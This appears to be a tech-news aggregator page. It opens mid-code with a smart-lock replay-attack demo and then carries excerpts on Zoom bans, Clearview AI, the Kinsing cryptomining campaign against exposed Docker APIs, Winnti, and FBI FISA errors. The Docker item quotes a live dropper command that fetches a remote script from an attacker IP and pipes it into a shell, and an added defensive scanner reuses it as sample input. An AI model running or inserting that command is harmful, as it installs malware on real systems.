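        self.keys: Dict[str, bytes] = {}      # user_id -> key (authorized users only)
        self.pending: Dict[str, bytes] = {}   # user_id -> outstanding nonce

    def add_user(self, user_id: str) -> bytes:
        """Owner enrols a user; the key is provisioned to that user's app."""
        key = secrets.token_bytes(32)
        self.keys[user_id] = key
        return key

    def revoke_user(self, user_id: str) -> None:
        self.keys.pop(user_id, None)
        self.pending.pop(user_id, None)

    def challenge(self, user_id: str) -> Optional[bytes]:
        """Issue a single-use nonce, or None if the user is not authorized."""
        if user_id not in self.keys:
            return None
        nonce = secrets.token_bytes(16)
        self.pending[user_id] = nonce
        return nonce

    def handle(self, user_id: str, response: bytes) -> bool:
        key = self.keys.get(user_id)
        nonce = self.pending.pop(user_id, None)   # consumed whether or not it verifies
        if key is None or nonce is None:
            return False
        expected = hmac.new(key, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)


def app_response(key: bytes, nonce: bytes) -> bytes:
    """What the legitimate app computes from its provisioned key."""
    return hmac.new(key, nonce, hashlib.sha256).digest()


def demo() -> Dict[str, object]:
    """Run both designs against an eavesdropper who captured one exchange."""
    results: Dict[str, object] = {}

    # Weak lock: the sniffed message is itself the credential.
    weak = ReplayableLock(b"UNLOCK")
    captured = b"UNLOCK"                                    # seen on the unencrypted link
    results["weak_replay"] = weak.handle(captured)          # True: replay opens the lock

    # Hardened lock: legitimate use, then a replay, then use after revocation.
    lock = ChallengeResponseLock()
    key = lock.add_user("guest")
    nonce = lock.challenge("guest")
    answer = app_response(key, nonce)
    results["strong_first_use"] = lock.handle("guest", answer)       # True

    lock.challenge("guest")                                 # eavesdropper requests a new challenge
    results["strong_replay"] = lock.handle("guest", answer)          # False: answer bound to old nonce

    lock.revoke_user("guest")
    results["strong_revoked_challenge"] = lock.challenge("guest")    # None: no key, no challenge
    results["strong_revoked_unlock"] = lock.handle("guest", answer)  # False
    return results
```

The point of the revocation step is that authorization is enforced on the lock, where the key lives, rather than only in the app's user list; with the static design the lock cannot distinguish a current user from a revoked one, because there is nothing user-specific in the message it accepts.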

How’d this happen?

And how did Tapplock fail to discover any of these weaknesses? Because the company did not have a security program prior to the third-party researchers’ discoveries, the FTC alleges.

Source: Easy-to-pick “smart” locks gush personal data, FTC finds | Ars Technica

Zoom banned by Taiwan’s government over China security fears

Zoom has been banned from government business in Taiwan in the latest setback for the hugely popular video-calling app.

It follows revelations that some Zoom traffic was “mistakenly” routed through China, which does not recognise Taiwan’s independence.

Taiwan’s government said public bodies should not use products with security concerns “such as Zoom”.

But competitors like Google and Microsoft were acceptable, it said.

China considers Taiwan a breakaway rebel province, destined to be reunited with the mainland.

Last week, researchers discovered that some traffic from the video-calling app was being sent through Beijing – even when all participants on the Zoom call were in North America.

The team from University of Toronto’s Citizen Lab also highlighted that Zoom has several hundred employees in mainland China, which “could also open up Zoom to pressure from Chinese authorities”.

Zoom said the traffic was “mistakenly” routed through Beijing, and apologised.

Despite the response from Zoom, Taiwan has told its public institutions to use other software.

Where possible, domestic solutions should be used, it said, adding that in special circumstances, Google or Microsoft’s apps were acceptable. Those firms operate the Duo and Skype services respectively.

It is the latest blow to Zoom, which has exploded in popularity during the coronavirus pandemic, resulting in increased scrutiny.

Source: Zoom banned by Taiwan’s government over China security fears – BBC News

Creepy Face Recognition Firm Clearview AI Sure Has a Lot of Ties to the Far Right – the extremist kinds of far right

Clearview AI, the dystopian face recognition company that claims to have amassed a database of billions of photos, signed contracts with hundreds of law enforcement agencies, and shopped its app around to the rich and powerful, has extensive links to the far right, according to a Huffington Post investigation. In fact, one of its associates claimed to have been working on a face recognition product explicitly designed to be useful for mass deportations.

Founder Hoan Ton-That has links to the far-right movement that move right past suspicious into obvious, according to HuffPo. He reportedly attended a 2016 dinner with white supremacist Richard Spencer and organized by alt-right financier Jeff Giesea, an associate of Palantir founder and Trump-supporting billionaire Peter Thiel. (Thiel secretly bankrolled a lawsuit that bankrupted Gizmodo’s former parent company, Gawker Media.) Ton-That was also a member of a Slack channel run by professional troll Chuck Johnson for his now-defunct WeSearchr, a crowdfunding platform primarily used by white supremacists; that channel included people like the webmaster of neo-Nazi site Daily Stormer, Andrew Auernheimer, and conspiracy theorist Mike Cernovich.

Per HuffPo, in January 2017 Johnson posted on Facebook that he was working on “building algorithms to ID all the illegal immigrants for the deportation squads.” Another source told HuffPo that they had seen him bragging about that work to “a whole bunch of really important people” at Trump’s DC hotel that spring, introducing them to a man the source identified as almost certainly being Ton-That.

Johnson, who was involved with Trump’s transition team, also hit up then-Breitbart employee Katie McHugh, who at that time was a white supremacist but has since left the movement. McHugh told HuffPo that Johnson asked to be put in contact with ghoulish Trump adviser Stephen Miller so he could tout a “way to identify every illegal alien in the country.” (It’s unclear whether that happened, but Clearview’s clients include Immigration and Customs Enforcement and the FBI.) That same year, Thiel invested $200,000 in Clearview.

Smartcheckr’s labor pool also included many ethnonationalists who believe in purging the U.S. of nonwhites, according to HuffPo. One of those was hardcore racist and Johnson associate Tyler Bass, who described himself as an “investigator” doing “remote software testing” for the app and whose LinkedIn posts suggest he may have had access to law enforcement data associated with criminal investigations as late as 2018. Bass also claimed to McHugh to have been in attendance at a disastrous far-right rally in Charlottesville, Virginia in 2017, where a neo-Nazi terror attack killed protester Heather Heyer and wounded scores of others.

Another was Douglass Mackey, the overseer of a vast online racist propaganda operation under the moniker “Ricky Vaughn,” who had a role as a contract consultant for Smartcheckr. While there, he touted the use of its face recognition tools to anti-Semitic congressional candidate Paul Nehlen for extreme campaign opposition research. (Ton-That told HuffPo that Mackey was only a contractor for three weeks and his offer to Nehlen was unauthorized, though Smartcheckr employees took steps to distance themselves from Mackey after he was outed as “Ricky Vaughn” in 2018.)

There was also Marko Jukic, HuffPo wrote, a Clearview AI employee who marketed its products to police departments and had a history as a prolific contributor to extremist blogs, including a post where he advocated “segregation and separation” of Jews. One of Clearview’s lawyers, Tor Ekeland, is best known for representing far-right provocateurs and racists like Auernheimer.

Johnson appears to have had access to WeSearchr until at least January 2020, when he showed a fellow passenger on a flight to Boston a powerful face recognition app on his phone, according to a BuzzFeed report. In a statement to HuffPo, Ton-That denied that Johnson was an “executive, employee, consultant” or board member of Clearview, though he didn’t clarify whether Johnson holds equity in the company. He also told the site that Clearview has severed ties with Bass and Jukic, claiming he was “shocked by and completely unaware of Marko Jukic’s online writings under a different name.” (Jukic used the same pseudonym to talk with Ton-That on Slack and email that he did in his racist blog posts, HuffPo noted.)

Ton-That also told the site that he grew up on the internet, which “not always served me well” during his upbringing, adding: “There was a period when I explored a range of ideas—not out of belief in any of them, but out of a desire to search for self and place in the world. I have finally found it, and the mission to help make America a safer place. To those who have read my words in the Huffington Post article, I deeply apologize for them.”

Clearview built its face recognition database by scraping photos en masse from public social media posts, a practice that is technically legal but could expose it to significant civil liability from rights holders. While scraping is legal, Clearview’s business practices have resulted in cease-and-desists from Silicon Valley giants like Google, and may have run afoul of other laws. The state attorney general of Vermont filed a lawsuit against the company last month alleging violations of the Vermont Consumer Protection Act and a state data broker law, while the AG of New Jersey ordered all police in the state to stop using Clearview products. Canadian privacy commissioners are investigating the company; it is also facing two class action lawsuits, one of which alleges that the company violated Illinois biometrics laws.

Source: Creepy Face Recognition Firm Clearview AI Sure Has a Lot of Ties to the Far Right

If you don’t cover your Docker daemon API port you’ll have a hell of a time… because cryptocreeps are hunting for it

Some Docker installations are getting hammered by malware skiddies hoping to mine digital cash using other people’s CPU time.

Infosec outfit Aqua – no, not the Barbie Girl band – said miscreants have spotted that a decent number of Docker deployments are lazily or inadvertently exposing the daemon API port to the public internet with no protection. It’s a fairly common error that hackers have exploited in the past to mine digital coins, although lately we’re told there have been thousands of infection attempts daily via this interface, all involving a piece of Linux malware dubbed Kinsing.

“These are the highest numbers we’ve seen in some time, far exceeding what we have witnessed to date,” noted researcher Gal Singer this week.

“We therefore believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor.”

If an open system is found, the attacker tells it to create and run a custom Ubuntu container that executes the following command:

/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null

The fetched d.sh script disables SELinux protections, and searches out and removes any other malware or cryptomining containers already running on the infected machine so that it won’t have to compete for CPU time. It uses crontab to ensure it is re-run every minute, and does a bunch of other stuff: it’s 600 lines long.

The script also downloads the Kinsing malware proper, and runs it. This software nasty tries to make contact with one of four command and control servers in Eastern Europe for any special orders to carry out on the infected system. It also runs a script, called spre.sh, that uses any SSH keys it finds to log into and spread to other machines to run its code.

“The spre.sh shell script that the malware downloads is used to laterally spread the malware across the container network,” Aqua’s Singer said.

“In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from /.ssh/config, .bash_history, /.ssh/known_hosts, and the likes. We did not identify any active scanning techniques used to identify additional targets.”

Once that is done, the mining component of the malware is finally executed.

[Image: Kinsing malware diagram, showing the attack process]

The Register has pinged Docker for comment on the attacks. In the meantime, Singer and Aqua recommend blocking the IP addresses linked to this outbreak. It’s also highly recommended you don’t leave the daemon API port facing the internet, and use policies and configurations to limit what systems are allowed to talk to the interface.

“Identify all cloud resources and group them by some logical structure,” said the team. “Review authorization and authentication policies, basic security policies, and adjust them according to the principle of least privilege. Investigate logs, mostly around user actions, look for actions you can’t account for, anomalies.”
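Two defender-side checks for the exposure described above, added here as an example and not Aqua's or Docker's code. The first audits a Docker daemon.json for an API socket served over plain TCP without client-certificate verification ("hosts", "tlsverify", "tlscacert", "tlscert" and "tlskey" are real daemon options; the two sample configurations are constructed). The second flags container start commands that fetch a remote script and pipe it straight into a shell, using the command quoted in the article as sample input next to a constructed benign one.

```python
"""Defender-side checks for an exposed Docker daemon API.

Added example, not Aqua's or Docker's code. The daemon.json keys used
are real Docker options; the sample configurations, the container
names and the nginx command are constructed. The malicious command is
the one quoted in the article.
"""
import json
import re
from typing import Dict, List

# Constructed: a daemon listening on every interface with no TLS at all.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Constructed: TCP API only on an internal address, client certs required.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Container command quoted in the article (Kinsing dropper).
KINSING_CMD = ("/bin/bash -c apt-get update && apt-get install -y wget cron;"
               "service cron start; wget -q -O - 142.44.191.122/d.sh | sh;"
               "tail -f /dev/null")

# Constructed `docker ps`-style inventory: container name -> start command.
SAMPLE_CONTAINERS = {
    "web": "nginx -g 'daemon off;'",       # benign
    "determined_turing": KINSING_CMD,      # the quoted dropper
}

ALL_INTERFACES = {"", "0.0.0.0", "[::]"}


def audit_daemon_config(daemon_json: str) -> List[str]:
    """Return findings for tcp:// listeners in a daemon.json document.

    Anyone who can reach an unauthenticated daemon socket can create
    containers with arbitrary mounts, which is what the attack above
    relies on. Binding to all interfaces widens that to whatever network
    the host sits on; without tlsverify there is no client authentication.
    """
    cfg = json.loads(daemon_json)
    findings: List[str] = []
    tls_verify = bool(cfg.get("tlsverify", False))
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue                      # unix:// and fd:// are local-only
        addr = host[len("tcp://"):]
        bind = addr.rsplit(":", 1)[0] if ":" in addr else addr
        if bind in ALL_INTERFACES:
            findings.append(f"{host}: API bound to all interfaces")
        if not tls_verify:
            findings.append(f"{host}: TCP API without tlsverify (no client authentication)")
    return findings


# A remote fetch whose output goes straight into a shell interpreter.
FETCH_PIPE_SH = re.compile(r"\b(?:wget|curl)\b[^|;]*\|\s*(?:ba)?sh\b")
# Installing a download tool as the first thing a fresh container does.
INSTALLS_FETCH_TOOL = re.compile(r"\bapt-get install\b[^;|&]*\b(?:wget|curl)\b")
# Common idiom to keep a container alive after the real payload has run.
KEEPALIVE = re.compile(r"\btail -f /dev/null\b")


def suspicious_container_cmd(cmd: str) -> List[str]:
    """Return the reasons a container start command looks like a dropper."""
    reasons: List[str] = []
    if FETCH_PIPE_SH.search(cmd):
        reasons.append("remote script piped into a shell")
    if INSTALLS_FETCH_TOOL.search(cmd):
        reasons.append("installs a download tool at container start")
    if KEEPALIVE.search(cmd):
        reasons.append("keep-alive after payload (tail -f /dev/null)")
    return reasons


def scan_containers(containers: Dict[str, str]) -> Dict[str, List[str]]:
    """Map container name -> reasons, for every entry that tripped a rule."""
    flagged: Dict[str, List[str]] = {}
    for name, cmd in containers.items():
        reasons = suspicious_container_cmd(cmd)
        if reasons:
            flagged[name] = reasons
    return flagged


if __name__ == "__main__":
    print(audit_daemon_config(WEAK_DAEMON_JSON))
    print(audit_daemon_config(HARDENED_DAEMON_JSON))
    print(scan_containers(SAMPLE_CONTAINERS))
```

Feed audit_daemon_config the contents of /etc/docker/daemon.json, but check the service unit too: dockerd refuses to start when "hosts" is set in daemon.json and -H is also passed on the command line, so on systemd hosts the listener is often configured in ExecStart rather than in the JSON file. Even with tlsverify on, the port should be reachable only from the hosts that manage the daemon. The regexes are deliberately narrow and will miss a dropper that obfuscates the fetch; treat them as a tripwire for reviewing container create events, not a complete detector.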

Source: If you don’t cover your Docker daemon API port you’ll have a hell of a time… because cryptocreeps are hunting for it • The Register

Facebook asks users about coronavirus symptoms, releases friendship data to researchers

Facebook Inc said on Monday it would start surveying some U.S. users about their health as part of a Carnegie Mellon University research project aimed at generating “heat maps” of self-reported coronavirus infections.

The social media giant will display a link at the top of users’ News Feeds directing them to the survey, which the researchers say will help them predict where medical resources are needed. Facebook said it may make surveys available to users in other countries too, if the approach is successful.

Alphabet Inc’s Google, Facebook’s rival in mobile advertising, began querying users for the Carnegie Mellon project last month through its Opinion Rewards app, which exchanges responses to surveys from Google and its clients for app store credit.

Facebook said in a blog post that the Carnegie Mellon researchers “won’t share individual survey responses with Facebook, and Facebook won’t share information about who you are with the researchers.”

The company also said it would begin making new categories of data available to epidemiologists through its Disease Prevention Maps program, which is sharing aggregated location data with partners in 40 countries working on COVID-19 response.

Researchers use the data to provide daily updates on how people are moving around in different areas to authorities in those countries, along with officials in a handful of U.S. cities and states.

In addition to location data, the company will begin making available a “social connectedness index” showing the probability that people in different locations are Facebook friends, aggregated at the zip code level.

Laura McGorman, who runs Facebook’s Data for Good program, said the index could be used to assess the economic impact of the new coronavirus, revealing which communities are most likely to get help from neighboring areas and others that may need more targeted support.

New “co-location maps” can similarly reveal the probability that people in one area will come in contact with people in another, Facebook said.

Source: Facebook asks users about coronavirus symptoms, releases friendship data to researchers – Reuters

This might actually be a good way to use all that privacy invading data

China’s Winnti group stayed under the radar for a decade by aiming for Linux servers

A group of hackers operating as an offshoot of China’s Winnti group managed to stay undetected for more than a decade by going open source.

A report from BlackBerry outlines how the group, actually a collection of five smaller crews of hackers thought to be state-sponsored, assembled in the wake of Winnti and exploited Linux servers, plus the occasional Windows Server box and mobile device, for years.

“The APT groups examined in this report have traditionally pursued different objectives and focused on a wide array of targets,” BlackBerry noted.

“However, it was observed that there is a significant degree of coordination between these groups, particularly where targeting of Linux platforms is concerned, and it is assessed that any organization with a large Linux distribution should not assume they are outside of the target sets for any of these groups.”

First chronicled by researchers back in 2013, the Winnti hacking operation is thought to date back as far as 2009. These groups, described by BlackBerry as “offshoots” of that hacking outfit, have been around for nearly as long and use similar tactics.

Part of the reason the attacks have gone unnoticed for so long, BlackBerry reckons, is the groups’ preference for Linux servers. It is believed the hackers use three different backdoors, two rootkits, and two other build tools that can be used to construct additional rootkits on a per-target basis for open-source servers.

This is in addition to the command-and-control tools and what is described as a “massive botnet” of compromised Linux servers and devices. Some of the malware has been in use dating back to 2012.

Source: Want to stay under the radar for a decade or more? This Chinese hacking crew did it… by aiming for Linux servers • The Register

American schools are banning Zoom and switching to Microsoft Teams

After many schools adopted Zoom to conduct online lessons during the coronavirus lockdown, concerns about security and privacy have led to a ban on the video conferencing software across the US.

The chancellor of New York City’s Department of Education Richard A Carranza sent an email to school principals telling them to “cease using Zoom as soon as possible”. And he is not alone; schools in other parts of the country have taken similar action, and educators are now being trained to use Microsoft Teams as this has been suggested as a suitable alternative, partly because it is compliant with FERPA (Family Educational Rights and Privacy Act).

Large numbers of teachers spent time learning how to use Zoom to continue educating pupils who are confined to their homes. But growing criticism of Zoom for its approach to privacy and security has given cause for a rethink. Documents seen by Chalkbeat show that principals in NYC have been told: “Based on the DOE’s review of those documented concerns, the DOE will no longer permit the use of Zoom at this time”.

The Washington Post quotes Danielle Filson, spokesperson for the NYC Education Department, as saying:

Providing a safe and secure remote learning experience for our students is essential, and upon further review of security concerns, schools should move away from using Zoom as soon as possible. There are many new components to remote learning, and we are making real-time decisions in the best interest of our staff and students. We will support staff and students in transitioning to different platforms such as Microsoft Teams that have the same capabilities with appropriate security measures in place.

The Post also reports that Clark County Public Schools in Nevada were also moving away from Zoom, saying in a statement that the decision had been taken to “disable access to Zoom out of an abundance of caution due to instances of hacking that created unsafe environments for teachers and students”.

Schools in Utah, Washington state and beyond are also looking into Zoom alternatives.

Source: American schools are banning Zoom and switching to Microsoft Teams

Dr. Drew Pinsky Played Down COVID-19, Then Tries To DMCA Away The Evidence

Update: The full video is now back up and it’s even worse than the original clip we posted. It’s unclear if it went back up thanks to YouTube deciding it was fair use, or Pinsky removing the bogus takedown. Either way, watch it here:

Copyright system supporters keep insisting to me that copyright is never used for censorship, and yet over and over again we keep seeing examples that prove that wrong. The latest is Dr. Drew Pinsky, the somewhat infamous doctor and media personality, who has been one of the more vocal people in the media playing down the impact of the coronavirus. A video that had gone viral on Twitter and YouTube showed many, many, many clips of Dr. Drew insisting that COVID-19 was similar to the flu, and that it wouldn’t be that bad. Assuming it hasn’t been taken down due to a bogus copyright claim, you can hopefully see it below:

As you can see, for well over a month, deep into March when it was blatantly obvious how serious COVID-19 was, he was playing down the threat. Beyond incorrectly comparing it to the flu (saying that it’s “way less virulent than the flu” on February 4th — by which time it was clearly way more virulent than the flu in China), he said the headlines should say “way less serious than influenza,” he insisted that the lethality rate was probably around “0.02%” rather than the 2% being reported. On February 7th, he said your probability of “dying from coronavirus — much higher being hit by an asteroid.” He also mocked government officials for telling people to stay home, even at one point in March saying he was “angry” about a “press-induced panic.” On March 16th, the same day that the Bay Area in California shut down, he insisted that if you’re under 65 you have nothing to worry about, saying “it’s just like the flu.” This was not in the distant past. At one point, a caller to his show, again on March 16th, said that because it’s called COVID-19 that means there were at least 18 others of them, and that’s why no one should worry — and Drew appeared to agree, making it appear he didn’t even know that the 19 refers to the year not the number of coronaviruses, and even though there are other coronaviruses out there, this one was way more infectious and deadly, so it doesn’t matter.

To give him a tiny bit of credit, on Saturday, Pinsky posted a series of choppy videos on Twitter in which he flat out said that he was wrong and he was sorry for his earlier statements, and said that he regretted his earlier statements. He also claimed that he signed up to help in California and NY if he was needed. But, even that apology seems weak in the face of what else he said in those videos… and, more importantly, his actions. In terms of what he said, he kept saying that he always said to listen to Dr. Fauci and to listen to your public health officials. Amazingly, at one point in his apology video, he insists that he thinks the real reason why New York got hit so bad is because of hallways and trains. Yet, in the video above, at one point he literally mocks NYC Mayor de Blasio for telling people to avoid crowded trains, saying: “de Blasio told them not to ride the trains! So they’re not riding the trains! So I am! [guffaw] I mean, it’s ridiculous.”

Given that, it’s a bit difficult to take him seriously when he claims that all along he always said to listen to your public officials, when just a few weeks ago he was mocking them. Indeed, as multiple people have pointed out, the issue here isn’t so much that Pinsky was wrong — in the early days, when there wasn’t as much info, lots of people got things wrong about COVID-19 (though Pinsky kept it up way way after most others recognized how serious it was), but that he acted so totally sure about his opinions that this was nothing to worry about. It was the certainty with which he said what he said that was so much of the problem, including deep into it already being a pandemic with local officials warning people to stay home.

But, even worse, just as he was doing the right thing and mostly apologizing… he was trying to hide those earlier clips that made him look so, so, so bad. His organization began sending out DMCA notices. If you went to the original YouTube upload you got this:

That says: “This video is no longer available due to a copyright claim by Drew Pinsky Inc.” Now, some might argue that it was just some clueless staffer working for Dr. Drew sending off bogus DMCAs, or maybe an automated bot… but nope. Drew himself started tweeting nonsense about copyright law at people. I originally linked to that tweet, but sometime on Sunday, after thousands of people — including some of the most famous lawyers in the country — explained to him why it was nonsense, he deleted it. But I kept a screenshot:

That says, amazingly:

Infringing copywrite laws is a crime. Hang onto your retweets. Or erase to be safe.

The wrongness-to-words ratio in that tweet is pretty fucking astounding. First of all, the layup: it’s copyright, Drew, not copywrite. Make sure you know the name of the fucking law you’re abusing to censor someone before tossing it out there. Second, no, infringing copyright is not a crime. Yes, there is such a thing as criminal copyright infringement, but this ain’t it. Someone posting a video of you would be, at best, civil infringement. For it to be criminal, someone would have to be making copies for profit — like running a bootleg DVD factory or something. Someone posting a 2 minute clip of your nonsense is not that.

Most important, however, this isn’t even civil infringement, thanks to fair use. Putting up a 2 minute video showing a dozen or so clips of Drew making an ass of himself is not infringing. It’s classic fair use — especially given the topic at hand.

So it’s really difficult to believe that Drew is really owning up to his mistakes when at the same time he says he’s sorry, he’s actively working to abuse the law to try to silence people from highlighting his previous comments. Also, someone should point him to Lenz v. Universal in which a court said that before sending a takedown, you need to take fair use into consideration. It certainly appears that Drew hasn’t the foggiest idea how copyright law works, so it seems unlikely he considered fair use at all.

I certainly understand that he likely regrets his earlier comments. And I appreciate his willingness to admit that he was wrong. But to really take ownership of your previous errors, you shouldn’t then be working doubletime to try to delete them from the internet and hide them from view. That’s not taking ownership of your mistakes, that’s trying to sweep them under the rug.

Source: Dr. Drew Pinsky Played Down COVID-19, Then Tries To DMCA Away The Evidence | Techdirt

For the past five years, every FBI secret spy court request to snoop on Americans has sucked, says watchdog

Analysis: The FBI has not followed internal rules when applying to spy on US citizens for at least five years, according to an extraordinary report [PDF] by the Department of Justice’s inspector general.

The failure to follow so-called Woods Procedures, designed to make sure the FBI’s submissions for secret spying are correct, puts a question mark over more than 700 approved applications to intercept and log every phone call and email made by named individuals.

Under the current system, the Feds apply to the Foreign Intelligence Surveillance Court (FISC), which can then grant the investigative agency extraordinary spying powers. These can also be granted retroactively if the agency needs to move quickly.

Back in 2001, however, a number of FISA warrants were found to have been granted on unverified information, driving the creation of the Woods Procedures, named after the FBI official who drew them up, Michael Woods.

Following a review last year of one of those successful applications that targeted a Trump campaign staffer called Carter Page, the FBI was found to have made “fundamental and serious errors” in its application. Inspector general Michael Horowitz then expanded his review to another 29 applications dated from October 2014 to September 2019 out of a pool of over 700 and found the same problems in every single other case he looked at, pointing to a systemic problem.

As a result, more than five years’ worth of secret spying activities by the US government may be illegitimate. Horowitz found the same “basic and fundamental errors” in every application.

Unaccountable

The FISA Court has long been highlighted by critics as an unaccountable body with extraordinary powers. Except for very rare occasions, only one side – the government – can present its case to the judges and as a result the court has approved almost every application. The process is wide open to abuse, critics have argued, and so it turns out to have been the case.

The Woods Procedures include things like sufficient supporting documentation of any assertions, a second review of any facts and assertions, and a re-verification of facts whenever an extension is applied for. They are a check and balance on power.

“We do not have confidence that the FBI has executed its Woods Procedures in compliance with FBI policy,” the report states.

It says that it couldn’t review files for four of the 29 selected FISA applications because the FBI has not been able to locate them and, in three of these instances, did not know if the files ever existed.

All of the 25 applications reviewed had “inadequately supported facts,” and “FBI and NSD officials we interviewed indicated to us that there were no efforts by the FBI to use existing FBI and NSD oversight mechanisms.”

Ah yeah but it’s all fixed now

Somewhat amazingly, the FBI doesn’t dispute the findings. The inspector general provided his report to the FBI and prosecutors for their feedback, and appended their responses to the report.

Neither the Feds nor the Dept of Justice denies the assertion that the FBI has not followed its own rules. And both argue that recent proposed changes, prompted solely by the inspector general’s previous report and which critics assert do not go far enough, have effectively fixed the issues.

There is no mention in either response or in the inspector general’s report of what the implications are for the hundreds of people that have been subject to secret spying orders that allow federal agents to track everything that person does and says.

But then, there may not be any implications because under the FISA rules, the person subjected to the spying is not informed of the order against them, even when the spying is over. And they are not even entitled to know or see any evidence compiled against them as a result of the spying operation, even if they are charged as a result of the spying.

It is, in short, a sign that the FBI cannot be trusted to follow its own rules even when those rules apply to the most invasive powers it can be given.

Source: For the past five years, every FBI secret spy court request to snoop on Americans has sucked, says watchdog • The Register